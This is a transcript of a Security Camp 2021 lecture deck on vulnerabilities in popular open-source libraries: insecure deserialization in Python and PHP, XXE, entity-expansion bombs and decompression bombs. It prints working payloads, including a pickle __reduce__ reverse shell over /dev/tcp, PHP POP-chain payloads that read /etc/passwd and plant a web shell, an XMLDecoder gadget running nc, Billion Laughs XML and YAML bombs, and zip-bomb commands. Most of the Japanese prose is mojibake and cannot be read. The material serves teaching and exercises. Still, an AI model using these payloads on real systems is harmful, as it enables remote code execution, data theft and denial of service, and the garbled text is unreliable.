Upgrade to Pro — share decks privately, control downloads, hide ads and more …

趣味と実益のための著名なOSSライブラリ起因の脆弱性の探求/seccamp2021-b5

@tkmru
September 19, 2021

 趣味と実益のための著名なOSSライブラリ起因の脆弱性の探求/seccamp2021-b5

@tkmru

September 19, 2021
Tweet

More Decks by @tkmru

Other Decks in Programming

Transcript

  1. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ 4όέοτ͸Α͘ૂΘΕ͍ͯΔ w Α͘ૂΘΕ͍ͯΔ"84ͷ࢓૊Έͷͻͱͭʹ4όέοτ͕͋Δ w ਖ਼໊ࣜশ"NB[PO4 "NB[PO4JNQMF4UPSBHF4FSWJDF  w Πϯλʔωοτܦ༝Ͱར༻Ͱ͖ΔετϨʔδαʔϏε

    w 4όέοτσʔλͷஔ͖৔ॴ w ੩తϑΝΠϧϗεςΟϯά͕Ͱ͖8FCαʔόͱͯ͠΋࢖༻Ͱ͖Δ w ༷ʑͳσʔλ͕ஔ͔ΕΔͷͰɺσʔλ͕ཉ͍͠߈ܸऀʹૂΘΕΔ 
  2. ։ൃӡ༻޻ఔͰͷπʔϧʹΑΔ੬ऑੑͷൃݟ ࡢࠓͷΠϯγσϯτࣄྫ w 4όέοτઃఆϛεʹΑΔԯສੈଳҎ্ͷݸਓ৘ใ࿙Ӯ w ΧϦϑΥϧχΞΛڌ఺ͱ͢Δσʔλ෼ੳձࣾͰ͋Δ"MUFSZY͔ࣾΒͷ࿙Ӯ w IUUQTXXXUSFOENJDSPDPNWJOGPQMTFDVSJUZOFXTWJSUVBMJ[BUJPOBOEDMPVEEBUBPONJMMJPOVT IPVTFIPMETFYQPTFEEVFUPNJTDPOpHVSFEBXTTCVDLFU w

    ެ։4όέοτΛɺϚϧ΢ΣΞΛ࢓ࠐΜͩঢ়ଶͰ্ॻ͖͢Δ߈ܸऀ w ޡͬͯॻ͖ࠐΈΛڐՄ͞Ε͍ͯΔόέοτʹϚϧ΢ΣΞΛॻ͖ࠐΈ w IUUQTXXXNDBGFFDPNCMPHTFOUFSQSJTFDMPVETFDVSJUZNDBGFFEJTDPWFSTHIPTUXSJUFSBQFSWBTJWFBXTT NBOJOUIFNJEEMFFYQPTVSF 
  3. 08"415PQʢʣ ؚ·ΕΔ੬ऑੑҰཡ w ΠϯδΣΫγϣϯ߈ܸ w ೝূͷෆඋ w ػඍͳ৘ใͷ࿐ग़ w 99&

    w ΞΫηε੍ޚͷෆඋ w ෆద੾ͳηΩϡϦςΟઃఆ w 944 w ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ w ط஌ͷ੬ऑੑͷ͋Δίϯϙʔωϯτ ͷ࢖༻ w ෆे෼ͳϩΪϯάͱϞχλϦϯά 
  4. 08"415PQʢʣ ؚ·ΕΔ੬ऑੑҰཡ w ΞΫηε੍ޚͷෆඋ w ෆద੾ͳ҉߸Խ w ΠϯδΣΫγϣϯ w ҆શͰͳ͍ઃܭ

    w ෆద੾ͳηΩϡϦςΟઃఆ w ੬ऑͳݹ͍ίϯϙʔωϯτ w ෆద੾ͳ*EFOUJpDBUJPOͱ "VUIFOUJDBUJPO w ιϑτ΢ΣΞͱσʔλͷ੔߹ͷෆඋ w ηΩϡϦςΟϩάͱϞχλϦϯάͷෆ උ w αʔόʔαΠυϦΫΤετϑΥʔδΣϦ ʢ443'ʣ 
  5. 1ZUIPOͰͷγϦΞϥΠζσγϦΞϥΠζ w QJDLMFϞδϡʔϧͷQJDLMFEVNQT ɺQJDLMFMPBET ͳͲͰ γϦΞϥΠζσγϦΞϥΠζͰ͖Δ γϦΞϥΠζͱσγϦΞϥΠζ  { 'name':

    'ηΩϡϦςΟɾΩϟϯϓશࠃେձ2021 ΦϯϥΠϯ', 'year': 2021, 'place': ‘online' } b'\x80\x04\x95k\x00\x00\x00\x00\x00\x00\x00}\x94( \x8c\x04name\x94\x8cA\xe3\x82\xbb\xe3\x82\xad\xe3 \x83\xa5\xe3\x83\xaa\xe3\x83\x86\xe3\x82\xa3\xe3\ x83\xbb\xe3\x82\xad\xe3\x83\xa3\xe3\x83\xb3\xe3\x 83\x97\xe5\x85\xa8\xe5\x9b\xbd\xe5\xa4\xa7\xe4\xb c\x9a2021 \xe3\x82\xaa\xe3\x83\xb3\xe3\x83\xa9\xe3\x82\xa4\ xe3\x83\xb3\x94\x8c\x04year\x94M\xe5\x07\x8c\x05p lace\x94\x8c\x06online\x94u.’
  6. 1)1ͰͷγϦΞϥΠζσγϦΞϥΠζ w ඪ४ؔ਺ͷTFSJBMJ[F ͱVOTFSJBMJ[F ͰγϦΞϥΠζσγϦΞϥΠζͰ͖Δ γϦΞϥΠζͱσγϦΞϥΠζ  array( 'name'=>'ηΩϡϦςΟɾΩϟϯϓશࠃେձ2021 ΦϯϥΠϯ’,

    'year'=>2021, 'place'=>'online' ) a:3:{s:4:"name";s:65:"ηΩϡϦςΟɾΩϟϯϓશࠃେձ 2021 ΦϯϥΠ ϯ”;s:4:”year";i:2021;s:5:"place";s:6:"online";}
  7. ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ ۩ମతͳ߈ܸํ๏ʢ1ZUIPOͷ৔߹ʣ w 1ZUIPOͰγϦΞϥΠζσγϦΞϥΠζ͸QJDLMFԽVOQJDLMFԽͱݺ͹Ε͍ͯΔ w QJDLMFEVNQT Λ࢖ͬͯΦϒδΣΫτΛQJDLMFԽ w ߈ܸʹ࢖͑ΔϚδοΫϝιουͱͯ͠@@SFEVDF@@ ϝιου͕஌ΒΕ͍ͯΔ

    w ݺͼग़͠ՄೳͳΦϒδΣΫτͱҾ਺Λλϓϧͱͯ͠ࢦఆ͢Δͱ࣮ߦͯ͘͠ΕΔ w ˠ@@SFEVDF@@ ϝιουͰPTTZTUFN Λ࣮ߦ͢ΔΦϒδΣΫτΛQJDLMFԽͯ͠ ૹ৴͢Δ͜ͱͰ೚ҙίʔυ࣮ߦʹ࣋ͪࠐΊΔʂ 
  8. ࣄલ՝୊݉બߟ՝୊& w 1ZUIPOʹ͸QJDLMFͱ͍͏ඪ४Ϟδϡʔϧ͕͋Γ·͢ɻQJDLMFͷެࣜυΩϡϝϯτʹهࡌ͞ Ε͍ͯΔΑ͏ʹɺQJDLMFͰ৴པͰ͖ͳ͍஋ΛσγϦΞϥΠζ͢Δ͜ͱ͸੬ऑੑͷݪҼͱͳ Γಘ·͢ɻͦͷཧ༝͓Αͼ߈ܸख๏ʹ͍ͭͯɺҎԼͷখ໰   ʹճ౴͍ͯͩ͘͠͞ɻ w খ໰

      Կނɺ੬ऑੑͱͳΔͷ͔Λઆ໌͍ͯͩ͘͠͞ʢඞਢճ౴ʣ w খ໰   ҎԼͷ1ZUIPOͷιʔείʔυʹ͸্هͷ੬ऑੑ͕ଘࡏ͠·͢ɻ ͜ͷ੬ऑੑΛ༻͍ͯɺ5$1ͷ൪ϙʔτʹର͢ΔϦόʔεγΣϧΛ࡞੒͍ͯͩ͘͠͞ɻ OFUDBUͰ൪ϙʔτΛ଴ͪड͚͓͖ͯɺ઀ଓཱ͕֬ͨ͠ޙɺMTͳͲͷίϚϯυΛଧͪࠐ Έ݁Ռ͕ฦͬͯ͘Ε͹ਖ਼ղͰ͢ɻʢҰ෦লུʣʢඞਢճ౴ʣ  ໰୊จ
  9. બߟ՝୊&  #!/usr/bin/env python3 # coding: UTF-8 import sys import

    base64 import pickle args = sys.argv if len(args) != 2: print('ୈҰҾ਺ʹBase64Τϯίʔυ͞ΕͨจࣈྻΛࢦఆ͍ͯͩ͘͠͞') try: data = base64.urlsafe_b64decode(args[1]) deserialized = pickle.loads(data) print('deserialized: {0}'.format(deserialized)) except: print('Failed to deserialize') ໰୊ίʔυ
  10. બߟ՝୊&ղઆ  #!/usr/bin/env python3 # coding: UTF-8 import pickle import

    socket import os import base64 class GetReverseShell(object): def __reduce__(self): return (os.system, ('/bin/sh </dev/tcp/localhost/1234 >&0 2>&0',)) payload = pickle.dumps(GetReverseShell()) print(base64.urlsafe_b64encode(payload)) ϖΠϩʔυੜ੒
  11. ҆શͰͳ͍σγϦΞϥΠθʔγϣϯ ߈ܸํ๏ʢ1)1ͷ৔߹ʣ w 1)1Ͱ͸TFSJBMJ[F Λ࢖ͬͯΦϒδΣΫτΛγϦΞϥΠζՄೳ w ߈ܸʹ࢖͑ΔϚδοΫϝιουͱͯ࣍͠ͷ͕̎ͭ༗໊ w @@XBLFVQ ϝιου

    w @@EFTUSVDU ϝιου w γϦΞϥΠζ͞ΕͨจࣈྻΛVOTFSJBMJ[F ʹ౉͢͜ͱͰΦϒδΣΫτΛૠೖ ͢Δ߈ܸख๏੬ऑੑΛ1)10CKFDU*OKFDUJPOͱ͍͏ 
  12. 1SPQFSUZ0SJFOUFE1SPHSBNNJOH Πϝʔδਤ  Ϋϥε Ϋϥε Ϋϥε Ϋϥε ΨδΣοτ ΨδΣοτ ΨδΣοτ

    ΨδΣοτ w ΨδΣοτͱݺ͹ΕΔஅยతͳίʔυΛ࣮ߦ͠ɺ࠷ऴతͳ໨తΛୡ੒͢Δ
  13. 1)1ಛ༗ͷςΫχοΫ  class Example { private $obj; function __construct() {

    // some PHP code… } function __wakeup() { if (isset($this->obj)) return $this->obj->evaluate(); } } class CodeSnippet { private $code; function evaluate() { eval($this->code); } } // some PHP code... $user_data = unserialize($_POST['data']); IUUQTWJDLJFMJNFEJVNDPNEJWJOHJOUPVOTFSJBMJ[FQPQDIBJOTCDCB w 1045ύϥϝʔλEBUB͸ VOTFSJBMJ[F ͞ΕΔ w ϚδοΫϝιου͸ &YBNQMFΫϥεʹ͋Δ w @@XBLFVQϝιουͰ͸ ม਺PCKͷFWBMVBUF Λ ࣮ߦ͢Δ w FWBM Λݺͼग़͢ $PEF4OJQQFUΫϥεͷ FWBMVBUF Λ࣮ߦ͍ͨ͠ʜ ࣮ߦ͍ͨ͠ʂʂʂ
  14. 1)1ಛ༗ͷςΫχοΫ w &YBNQMFΫϥεͷม਺PCK ʹ$PEF4OJQQFUΫϥεΛ ࢦఆ w $PEF4OJQQFUΫϥεͷ ม਺DPEFʹ࣮ߦͨ͠ ίʔυΛࢦఆ w

    ͜ͷΑ͏ͳಈ࡞Λ͢Δ γϦΞϥΠζ͞Εͨ ΦϒδΣΫτΛࢦఆͰ͖Ε ͹0,  class Example { private $obj; function __construct() { // some PHP code… } function __wakeup() { if (isset($this->obj)) return $this->obj->evaluate(); } } class CodeSnippet { private $code; function evaluate() { eval($this->code); } } // some PHP code... $user_data = unserialize($_POST['data']); IUUQTWJDLJFMJNFEJVNDPNEJWJOHJOUPVOTFSJBMJ[FQPQDIBJOTCDCB $PEF4OJQQFUΫϥεʹॻ͖׵͑Δ ࣮ߦ͍ͨ͠ίʔυΛ ೖྗ
  15. 1)1ಛ༗ͷςΫχοΫ w γϦΞϥΠζ͞ΕͨΦϒδ ΣΫτΛੜ੒͢Δ1)1ίʔ υΛॻ͖ɺ࣮ߦ͢Δͱ ߈ܸίʔυ͕ಘΒΕΔ  <?php class CodeSnippet

    { private $code = "phpinfo();"; } class Example { private $obj; function __construct() { $this->obj = new CodeSnippet; } } echo serialize(new Example); IUUQTWJDLJFMJNFEJVNDPNEJWJOHJOUPVOTFSJBMJ[FQPQDIBJOTCDCB $ php pop-poc.php O:7:"Example":1:{s:12:"Exampleobj";O:11:"CodeSnippet":1: {s:17:"CodeSnippetcode";s:10:"phpinfo();";}}
  16. 1SPQFSUZ0SJFOUFE1SPHSBNNJOH  γϦΞϥΠζ͞ΕͨΦϒδΣΫτ͸ਓྗͰಡΈॻ͖Ͱ͖Δ <?php class Seccamp { private $year =

    0; public function set_year($year){ $this->year = $year; } public function get_year(){ return $this->year; } } $object = new Seccamp(); $object->set_year(2021); echo serialize($object); w ࠨʹࣔ͢4FDDBNQΫϥεΛ ୊ࡐʹղઆ͍ͯ͘͠ w ϝϯόม਺ZFBSΛ࣋ͭ w TFU@ZFBSͱHFU@ZFBSͷͭ ͷϝιου͕͋Δ w TFU@ZFBSΛݺͼग़͠੔਺ Ληοτ͍ͯ͠Δ $ serialize-poc.php O:7:"Seccamp":1:{s:13:"Seccampyear";i:2021;}
  17. 1SPQFSUZ0SJFOUFE1SPHSBNNJOH γϦΞϥΠζϑΥʔϚοτৄઆ w CPPMFBO w CWBMVF w JOUFHFS w JWBMVF

    w EPVCMF w EWBMVF  IUUQTJOTPNOJBTFDDPNEPXOMPBETQVCMJDBUJPOT1SBDUJDBM1)10CKFDU*OKFDUJPOQEG w /6-- w / w TUSJOH w TMFOHUIWBMVF w BSSBZ w BMFOHUI\LFZ WBMVFQBJST^
  18. ԋशղઆ-FWFM  <?php class Setting { public $path = "config.json";

    public function read() { $content = file_get_contents($this->path); echo $content; } } class Main { public $file = null; public function __destruct(){ $this->file->read(); } } $m = new Main(); $m->file=new Setting(); $m->file->path = "/etc/passwd"; echo serialize($m); ϖΠϩʔυΛੜ੒͢Δίʔυ
  19. ԋशղઆ-FWFM  <?php class Setting { public $path = "config.json";

    public function read() { system("cat " . $this->path); } } class Main { public $file = null; public function __destruct(){ $this->file->read(); } } $m = new Main(); $m->file=new Setting(); $m->file->path = 'config.json; echo \'<?php system($_GET["cmd"]);?>\' > a.php'; echo serialize($m); ϖΠϩʔυΛੜ੒͢Δίʔυ
  20. 9.-ͷߏ଄ 9.-ͷྫ w λάͷೖΕࢠߏ଄Ͱσʔλ͕දݱ͞ΕΔ  <?xml version="1.0"?> <!DOCTYPE lectures[ <!ELEMENT

    lectures (lecture+)> <!ELEMENT lecture (title,instructor,track)> <!ELEMENT title (#PCDATA)> <!ELEMENT instructor (#PCDATA)> <!ELEMENT track (#PCDATA)> ]> <lectures> <lecture id="0005"> <title>झຯͱ࣮ӹͷͨΊͷஶ໊ͳOSSϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ</title> <instructor>খ஛ହҰ</instructor> <track>B</track> </lecture> </lectures> MFDUVSFTλάͷ಺༰Λఆٛ MFDUVSFTλάΛ࢖ͬͯ಺༰Λهࡌ
  21. 9.-ͷߏ଄ w ཁૉΛఆ͍ٛͯ͠ΔՕॴΛ%5%ʢ%PDVNFOU5ZQF%FpOJUJPOʣͱ͍͏  <?xml version="1.0"?> <!DOCTYPE lectures[ <!ELEMENT lectures

    (lecture+)> <!ELEMENT lecture (title,instructor,track)> <!ELEMENT title (#PCDATA)> <!ELEMENT instructor (#PCDATA)> <!ELEMENT track (#PCDATA)> ]> <lectures> <lecture id="0005"> <title>झຯͱ࣮ӹͷͨΊͷஶ໊ͳOSSϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ</title> <instructor>খ஛ହҰ</instructor> <track>B</track> </lecture> </lectures> 9.-ͷྫ MFDUVSFTλάΛ ఆٛ͢Δ%5%
  22. 9.-ͷߏ଄ w ྫʹ্͛ͨ9.-Ͱ͸MFDUVSFTλάͷߏ੒ཁૉɺଐੑΛఆ͍ٛͯͨ͠   w &OUJUZͱݺ͹ΕΔ໊લ෇͖ఆ਺ͷఆٛ΋Ͱ͖Δ  %5%ʹΑͬͯఆٛ͞ΕΔ΋ͷ <?xml

    version="1.0"?> <!DOCTYPE lectures[]> <?xml version="1.0"?> <!ENTITY title "झຯͱ࣮ӹͷͨΊͷஶ໊ͳOSSϥΠϒϥϦىҼͷ੬ऑੑͷ୳ٻ">
  23. 9.-ͷߏ଄ w ఆ਺Λද͢&OUJUZʹ͸*OUFSOBM&OUJUZͱ&YUFSOBM&OUJUZͷ̎छྨ͕͋Δ w 4:45&.ΩʔϫʔυΛ༻͍ͯ63*εΩʔϜ͔Β஋ΛऔಘͰ͖Δ w 8FCϖʔδͷ63-΍ϩʔΧϧͷϑΝΠϧύεΛࢦఆͯ͠ ֎෦͔Β஋Λऔಘ͢Δͷ͕&YUFSOBM&OUJUZ  *OUFSOBM&OUJUZͱ&YUFSOBM&OUJUZ

    <?xml version=“1.0"?> <!DOCTYPE demo [ <!ENTITY xml-file SYSTEM "http://example.com/sample.xml"> <!ENTITY txt-file SYSTEM “file:///path/to/file.txt“> ]> <demo> <file>&xml-file</file> <file>&txt-file</file> </demo>
  24. $7& w 99&ΛҾ͖ى͜͢9.-ϑΝΠϧͷྫ  ࣄલ՝୊ղઆ <?xml version="1.0" encoding=“UTF-8”?> <!DOCTYPE aaa

    [ <!ENTITY % dtd SYSTEM “http://localhost:5000/xxe”> %dtd; ]> <FILE_INFO> <BASIC_INFO> <STATE NAME="OWNER" TYPE=“string” VALUE=“tkmru” /> </BASIC_INFO> </FILE_INFO>
  25. $7& w 99&ΛҾ͖ى͜͢9.-ϑΝΠϧͷྫ  ࣄલ՝୊ղઆ <?xml version="1.0" encoding="UTF-8"?> <java version="11.0.9"

    class="java.beans.XMLDecoder"> <object class="ghidra.bitpatterns.info.FileBitPatternInfo"> <void property="ghidraURL"> <string>TODO: url</string> </void> <void property="languageID"> <string>x86:LE:64:default</string> </void> ʢলུʣ <object class="java.lang.Runtime" method="getRuntime"> <void method="exec"> <string>nc 127.0.0.1 5000</string> </void> </object> </java>
  26. #JMMJPO-BVHIT 9.-ϑΝΠϧྫ w MPMʢMPUTPGMBVHITʣͱ͍͏ΠϯλʔωοτεϥϯάΛ༻͍ͨϑΝΠϧ͕༗໊ w ͦͷͨΊ#JMMJPO-BVHITͱ໊෇͚ΒΕ͍ͯΔ  <?xml version="1.0"?> <!DOCTYPE

    lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz (#PCDATA)> <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"> <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"> <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"> <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"> <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"> <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"> <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;"> <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;"> <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;"> ]> <lolz>&lol9;</lolz>
  27. 2VBESBUJD#MPXVQFOUJUZFYQBOTJPO w ڊେͳจࣈྻʢ"""""""""""""""ʜʣ͕ೖͬͨΤϯςΟςΟʢYʣΛ ෳ਺ճݺͼग़͢͜ͱͰലେͳϝϞϦফඅΛૂ͏ w ࢦ਺ؔ਺తʹϝϞϦফඅྔ͕૿େ͢Δ#JMMJPO-BVHIT΄Ͳޮ཰తͰ͸ͳ͍ w ਂ͍ೖΕࢠʹͳͬͨΤϯςΟςΟΛېࢭ͢ΔύʔαͷରࡦΛ͢Γൈ͚ΒΕΔ  <?xml

    version="1.0"?> <!DOCTYPE DoS [ <!ENTITY x "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(লུ)"> ]> <DoS>&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;&x;(লུ)</DoS> 9.-ϑΝΠϧྫ
  28. 2VBESBUJD#MPXVQFOUJUZFYQBOTJPO 9.-ϑΝΠϧྫ w ڊେͳจࣈྻΛද͢ͷͰ9.-ϑΝΠϧͦͷ··Λจࣈྻͱͯ͠ѻ͏ΑΓ ίʔυதͰ9.-ϑΝΠϧΛ૊ΈཱͯΔ΄͏͕ѻ͍΍͍͢  size = 55000 entity

    = 'A' * size refs = '&x;' * size data = '''\ <?xml version="1.0"?> <!DOCTYPE DoS [ <!ENTITY x "{entity}"> ]> <DoS>{entityReferences}</DoS> '''.format(entity=entity, entityReferences=refs)
  29. #JMMJPO-BVHIT :".-ύʔαʹ΋༗ޮ  w #JMMJPO-BVHITΛࢼߦ͢Δ:".-ϑΝΠϧ lol1: &lol1 "lol" lol2: &lol2

    [*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1,*lol1] lol3: &lol3 [*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2,*lol2] lol4: &lol4 [*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3,*lol3] lol5: &lol5 [*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4,*lol4] lol6: &lol6 [*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5,*lol5] lol7: &lol7 [*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6,*lol6] lol8: &lol8 [*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7,*lol7] lol9: &lol9 [*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8,*lol8] lol10: &lol10 [*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9,*lol9]
  30. #JMMJPO-BVHIT LTͰͷ࣮ྫ  w IUUQTHJUIVCDPNLVCFSOFUFTLVCFSOFUFTJTTVFTΑΓൈਮ apiVersion: v1 data: a: &a

    ["web","web","web","web","web","web","web","web","web"] b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a] c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b] d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c] e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d] f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e] g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f] h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g] i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h] kind: ConfigMap metadata: name: yaml-bomb namespace: default
  31. 2VBESBUJDCMPXVQFOUJUZFYQBOTJPO :".-ύʔαʹ΋༗ޮ  w #JMMJPO-BVHITʹࣅͨ2VBESBUJDCMPXVQ΋ಉ͘͡༗ޮ w :".-ύʔαͰͷ2VBESBUJDCMPXVQʹରͯ͠ݴٴ͍ͯ͠Δจݙ͸ ͳ͔ͥݟ͔ͭΒͳ͍🤔 w ਂ͍ೖΕࢠʹͳͬͨΤϯςΟςΟΛېࢭ͢ΔύʔαͷରࡦΛ

    ͢Γൈ͚ΒΕΔʢ͸ͣʣ w ֤ϥΠϒϥϦͷରࡦͷࠩҟ·ͰௐࠪͰ͖ͯͳ͍͕ɺ 9.-ύʔαͱಉ͘͡#JMMJPO-BVHIT͸ແޮԽ͞Ε͍ͯΔ͚ΕͲɺ 2VBESBUJDCMPXVQ͕༗ޮͳϥΠϒϥϦ΋͋Γͦ͏ʢଟ෼ʣ
  32. %5%3FUSJFWBM w ͜Ε΋99&ͷҰछ w υΩϡϝϯτλΠϓͷࢦఆΛϩʔΧϧύε΍63-Λ࢖ͬͯߦ͑ΔͨΊ ࢦఆ͞Εͨ৔ॴʹ͋Δ৘ใΛऔಘͰ͖Δ  99&ͷҰछ <?xml version="1.0"

    encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head/> <body>text</body> </html>
  33. &YUFSOBMFOUJUZFYQBOTJPOΛࢼ͢  ԋशखݩͰࢼͯ͠ΈΑ͏ʢ෼ʣ w ࣍ͷσΟϨΫτϦ഑Լʹ͋Δ֤%PDLFSpMFΛಈ͔͢ͱɺ 1ZUIPOͷ֤ϥΠϒϥϦΛ༻͍ͯॻ͔Εͨίʔυ͕ &YUFSOBMFOUJUZFYQBOTJPOΛࢼߦ͢Δ9.-ϑΝΠϧΛॲཧ͢Δ  w ֤ϑΥϧμ಺ͷ%PDLFSpMF͔ΒίϯςφΛϏϧυͯ͠ಈ͔͍ͯͩ͘͠͞

    $ git clone [email protected]:tkmru/seccamp2021-b5.git $ cd seccamp2021-b5 $ cd handson/xml-parser/external-entity-expansion/ $ cd pulldom/python3.7.0 $ docker build . -t external-entity-expansion-pulldom $ docker run external-entity-expansion-pulldom
  34. %FDPNQSFTTJPO#PNC ѹॖ͞ΕͨϑΝΠϧʹΑΔ%P4 w ల։͢ΔͱڊେͳαΠζʹͳΔѹॖ͞ΕͨϑΝΠϧΛૹΔ͜ͱͰɺ σΟεΫ༰ྔͷѹഭΛૂ͏߈ܸख๏ w ѹॖ͞Εͨ9.-ετϦʔϜΛղੳͰ͖Δ9.-ϥΠϒϥϦ͕ର৅ʹͳΔ w ೔ຊޠͰ͸ߴѹॖϑΝΠϧര஄ɺ;*1ര஄ͱݺ͹Ε͍ͯΔ 

    $ dd if=/dev/zero bs=1M count=1024 | gzip > zeros.gz # bs*count=1GB $ dd if=/dev/zero bs=1M count=1024 | lzma -z > zeros.xy # bs*count=1GB $ ls -sh zeros.* 1020K zeros.gz #શͯ0ͳͷͰѹॖ཰͕ߴ͍ 148K zeros.xy #શͯ0ͳͷͰѹॖ཰͕ߴ͍
  35.